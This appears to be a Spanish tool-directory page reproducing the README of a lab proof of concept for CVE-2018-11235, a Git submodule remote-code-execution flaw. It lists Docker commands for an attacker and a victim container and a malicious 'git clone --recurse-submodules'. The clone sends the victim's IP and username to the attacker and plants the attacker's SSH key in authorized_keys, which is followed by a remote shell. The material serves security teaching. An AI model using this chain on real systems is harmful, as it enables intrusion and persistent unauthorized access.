Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-11235 — Prueba de concepto - Explotación de RCE : Vulnerabilidad en nombres de submódulos de Git - Ensimag Noviembre de 2018 | Kitploit
Herramientas/GitHubGitHub/ygouzerh/cve-2018-11235
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoLabs y Práctica
GitHubygouzerh/cve-2018-11235

CVE-2018-11235

Prueba de concepto - Explotación de RCE : Vulnerabilidad en nombres de submódulos de Git - Ensimag Noviembre de 2018

Ver Repositorio
1hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2018-11235

Para empezar

Para construir los contenedores Docker, use:

root@kitploit:~
make docker

(Los siguientes comandos make deben ejecutarse en paralelo en diferentes terminales desde su máquina)

Para iniciar el contenedor del servidor atacante, use:

root@kitploit:~
make run_server

para iniciar el contenedor que representa a la víctima, use:

root@kitploit:~
make run_client

El contenedor ejecutará el script client.py. El script transmitirá su dirección IP y su nombre de usuario al atacante.

Siga las instrucciones de la consola de los clientes para clonar el repositorio git malicioso.

root@kitploit:~
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned

Notará que la dirección IP y el nombre de usuario de la víctima se transmiten al servidor.

Después del clonado, verifique que la clave pública del atacante se haya agregado a authorized_keys del cliente.

Luego, puede abrir un shell en el cliente desde el servidor, con el siguiente comando (ejecutar en su máquina):

root@kitploit:~
make server_bash

ssh <transmitted_username>@<transmitted_host>

Preguntas

Si tiene algún problema al ejecutar este Proof of Concept, por favor cree un issue en este repositorio: https://github.com/ygouzerh/CVE-2018-11235/issues , le responderemos lo más rápido posible.

Descargar herramienta